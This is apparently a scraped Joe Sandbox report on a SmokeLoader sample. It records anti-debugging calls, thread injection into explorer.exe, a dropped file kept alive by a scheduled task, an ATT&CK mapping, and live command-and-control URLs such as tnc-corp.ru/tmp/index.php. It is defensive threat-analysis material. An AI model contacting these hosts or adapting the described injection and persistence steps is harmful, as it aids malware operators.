      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 5_2_00621564 push dword ptr fs:[00000030h]5_2_00621564
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_0040540B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040540B
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_0040456C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0040456C
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_00408D38 SetUnhandledExceptionFilter,7_2_00408D38
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_00405FB4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00405FB4

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Benign windows process drops PE files
      Source: C:\Windows\explorer.exeFile created: tcgiwaf.1.drJump to dropped file
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 211.171.233.126 80Jump to behavior
      Creates a thread in another existing process (thread injection)
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeThread created: C:\Windows\explorer.exe EIP: 87D19D0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafThread created: unknown EIP: 87F19D0Jump to behavior
      Maps a DLL or memory area into another process
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\Desktop\2Qvkmk7HGr.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Users\user\AppData\Roaming\tcgiwafSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
      Source: explorer.exe, 00000001.00000000.1748268149.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1749490951.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1752481052.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000001.00000000.1748268149.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000001.00000000.1748053995.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
      Source: explorer.exe, 00000001.00000000.1748268149.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: explorer.exe, 00000001.00000000.1748268149.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: GetLocaleInfoA,7_2_0040FAF0
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: GetNumberFormatW,InterlockedIncrement,SetFileAttributesW,GetCommMask,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,GetComputerNameA,ClearCommError,InterlockedIncrement,EnumTimeFormatsA,GetTempFileNameA,_memset,CommConfigDialogW,ReadConsoleInputA,GetVersionExW,CreateActCtxW,InterlockedExchange,InterlockedExchangeAdd,GetShortPathNameW,GetCurrencyFormatW,GetLocaleInfoW,InterlockedIncrement,SetVolumeMountPointA,GlobalUnWire,CreateSemaphoreW,7_2_004032A0
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_00403560 GetNumberFormatW,CreateJobObjectA,GetTimeFormatW,GetNumberFormatW,CreateJobObjectA,GetConsoleAliasExesA,CreateNamedPipeW,SetFileShortNameW,CreateProcessW,GetTimeFormatW,GetModuleFileNameW,TlsGetValue,SetEnvironmentVariableW,GetTimeFormatW,GetModuleFileNameA,7_2_00403560
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_00409A64 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_00409A64
      Source: C:\Users\user\AppData\Roaming\tcgiwafCode function: 7_2_004032A0 GetNumberFormatW,InterlockedIncrement,SetFileAttributesW,GetCommMask,GetNumberFormatW,GetLogicalDriveStringsA,VerifyVersionInfoW,GetComputerNameA,ClearCommError,InterlockedIncrement,EnumTimeFormatsA,GetTempFileNameA,_memset,CommConfigDialogW,ReadConsoleInputA,GetVersionExW,CreateActCtxW,InterlockedExchange,InterlockedExchangeAdd,GetShortPathNameW,GetCurrencyFormatW,GetLocaleInfoW,InterlockedIncrement,SetVolumeMountPointA,GlobalUnWire,CreateSemaphoreW,7_2_004032A0

      Stealing of Sensitive Information

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2005144387.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2004823776.0000000000570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Yara detected SmokeLoader
      Source: Yara matchFile source: 00000000.00000002.1769193164.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.1769009336.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2005144387.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.2004823776.0000000000570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Command and Scripting Interpreter      		1
      DLL Side-Loading      		33
      Process Injection      		11
      Masquerading      		OS Credential Dumping1
      System Time Discovery      		Remote Services1
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Native API      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		12
      Virtualization/Sandbox Evasion      		LSASS Memory421
      Security Software Discovery      		Remote Desktop ProtocolData from Removable Media2
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Exploitation for Client Execution      		Logon Script (Windows)Logon Script (Windows)33
      Process Injection      		Security Account Manager12
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive112
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS3
      Process Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Hidden Files and Directories      		LSA Secrets1
      Application Window Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
      Obfuscated Files or Information      		Cached Domain Credentials2
      File and Directory Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
      Software Packing      		DCSync115
      System Information Discovery      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      DLL Side-Loading      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      File Deletion      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538071 Sample: 2Qvkmk7HGr.exe Startdate: 20/10/2024 Architecture: WINDOWS Score: 100 23 volisc.biz 2->23 25 tnc-corp.ru 2->25 27 2 other IPs or domains 2->27 39 Multi AV Scanner detection for domain / URL 2->39 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 7 other signatures 2->45 7 2Qvkmk7HGr.exe 2->7         started        10 tcgiwaf 2->10         started        12 tcgiwaf 2->12         started        signatures3 process4 signatures5 47 Detected unpacking (changes PE section rights) 7->47 49 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 7->49 51 Maps a DLL or memory area into another process 7->51 59 3 other signatures 7->59 14 explorer.exe 59 3 7->14 injected 53 Antivirus detection for dropped file 10->53 55 Multi AV Scanner detection for dropped file 10->55 57 Machine Learning detection for dropped file 10->57 process6 dnsIp7 29 tnc-corp.ru 211.171.233.126, 54853, 54854, 55686 LGDACOMLGDACOMCorporationKR Korea Republic of 14->29 19 C:\Users\user\AppData\Roaming\tcgiwaf, PE32 14->19 dropped 21 C:\Users\user\...\tcgiwaf:Zone.Identifier, ASCII 14->21 dropped 31 System process connects to network (likely due to code injection or exploit) 14->31 33 Benign windows process drops PE files 14->33 35 Deletes itself after installation 14->35 37 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->37 file8 signatures9

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      2Qvkmk7HGr.exe39%ReversingLabs
      2Qvkmk7HGr.exe41%VirustotalBrowse
      2Qvkmk7HGr.exe100%AviraHEUR/AGEN.1306978
      2Qvkmk7HGr.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\tcgiwaf100%AviraHEUR/AGEN.1306978
      C:\Users\user\AppData\Roaming\tcgiwaf100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\tcgiwaf39%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      tnc-corp.ru2%VirustotalBrowse
      liverds.at5%VirustotalBrowse
      livbev.online6%VirustotalBrowse
      volisc.biz6%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://aka.ms/odirmr0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
      https://powerpoint.office.comcember0%URL Reputationsafe
      https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
      https://excel.office.com0%URL Reputationsafe
      http://schemas.micro0%URL Reputationsafe
      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%URL Reputationsafe
      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%URL Reputationsafe
      https://api.msn.com/q0%URL Reputationsafe
      https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc0%URL Reputationsafe
      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
      https://wns.windows.com/L0%URL Reputationsafe
      https://word.office.com0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%URL Reputationsafe
      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
      https://aka.ms/Vh5j3k0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%URL Reputationsafe
      https://api.msn.com/v1/news/Feed/Windows?&0%URL Reputationsafe
      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%URL Reputationsafe
      https://www.rd.com/list/polite-habits-campers-dislike/0%URL Reputationsafe
      https://android.notify.windows.com/iOS0%URL Reputationsafe
      https://api.msn.com/0%URL Reputationsafe
      https://outlook.com_0%URL Reputationsafe
      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark0%URL Reputationsafe
      https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%URL Reputationsafe
      http://volisc.biz/tmp/index.php0%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      tnc-corp.ru
      		211.171.233.126
      		truetrueunknown
      volisc.biz
      		unknown
      		unknowntrueunknown
      liverds.at
      		unknown
      		unknowntrueunknown
      livbev.online
      		unknown
      		unknowntrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://volisc.biz/tmp/index.phptrueunknown
      http://livbev.online/tmp/index.phptrue
        		unknown
        http://liverds.at/tmp/index.phptrue
          		unknown
          http://tnc-corp.ru/tmp/index.phptrue
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://aka.ms/odirmrexplorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
              		unknown
              https://powerpoint.office.comcemberexplorer.exe, 00000001.00000000.1758674619.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000001.00000000.1752481052.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                		unknown
                https://excel.office.comexplorer.exe, 00000001.00000000.1758674619.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://schemas.microexplorer.exe, 00000001.00000000.1753482488.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1751138246.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1751529258.0000000008720000.00000002.00000001.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  		unknown
                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    		unknown
                    https://api.msn.com/qexplorer.exe, 00000001.00000000.1752481052.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000001.00000000.1758674619.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      		unknown
                      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        		unknown
                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000001.00000000.1758674619.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                          		unknown
                          https://wns.windows.com/Lexplorer.exe, 00000001.00000000.1758674619.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://word.office.comexplorer.exe, 00000001.00000000.1758674619.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                            		unknown
                            https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              		unknown
                              https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                		unknown
                                https://aka.ms/Vh5j3kexplorer.exe, 00000001.00000000.1749862002.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000001.00000000.1752481052.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://android.notify.windows.com/iOSexplorer.exe, 00000001.00000000.1758674619.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000001.00000000.1749862002.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://api.msn.com/explorer.exe, 00000001.00000000.1752481052.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://outlook.com_explorer.exe, 00000001.00000000.1758674619.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.msn.com:443/en-us/feedexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000001.00000000.1749862002.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            211.171.233.126
                                            		tnc-corp.ruKorea Republic of
                                            		3786LGDACOMLGDACOMCorporationKRtrue

                                            General Information

                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1538071
                                            Start date and time:2024-10-20 09:36:05 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 7m 48s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:7
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:2Qvkmk7HGr.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:4bb69f9fad0620ecb64971676b9f2cbc.exe
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@3/2@72/1
                                            EGA Information:
                                            • Successful, ratio: 66.7%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 28
                                            • Number of non-executed functions: 28
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded IPs from analysis (whitelisted): 20.190.159.0, 20.190.159.64, 20.190.159.68, 20.190.159.4, 20.190.159.75, 20.190.159.71, 20.190.159.2, 40.126.31.67
                                            • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                            • Execution Graph export aborted for target tcgiwaf, PID 5848 because there are no executed function
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                            • Report size getting too big, too many NtOpenKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            03:37:24API Interceptor392073x Sleep call for process: explorer.exe modified
                                            08:37:23Task SchedulerRun new task: Firefox Default Browser Agent B5D95B271C8A718D path: C:\Users\user\AppData\Roaming\tcgiwaf

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            211.171.233.126z2vfX2REnQ.exeGet hashmaliciousSmokeLoaderBrowse
                                            • tnc-corp.ru/tmp/index.php
                                            wxy6cQKIqG.exeGet hashmaliciousSmokeLoaderBrowse
                                            • tnc-corp.ru/tmp/index.php
                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                            • nwgrus.ru/tmp/index.php
                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                            • nwgrus.ru/tmp/index.php
                                            LavMqtzZNw.exeGet hashmaliciousLummaC, SmokeLoaderBrowse
                                            • movlat.com/tmp/
                                            uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                            • dbfhns.in/tmp/index.php
                                            Jrkfds7rI5.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, PureLog StealerBrowse
                                            • sajdfue.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                                            SecuriteInfo.com.Win32.RansomX-gen.4067.126.exeGet hashmaliciousLummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, RedLine, SmokeLoaderBrowse
                                            • kamsmad.com/tmp/index.php
                                            7leZRNBofA.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                            • trmpc.com/check/index.php
                                            SKHOtnHl7J.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                            • kamsmad.com/tmp/index.php

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
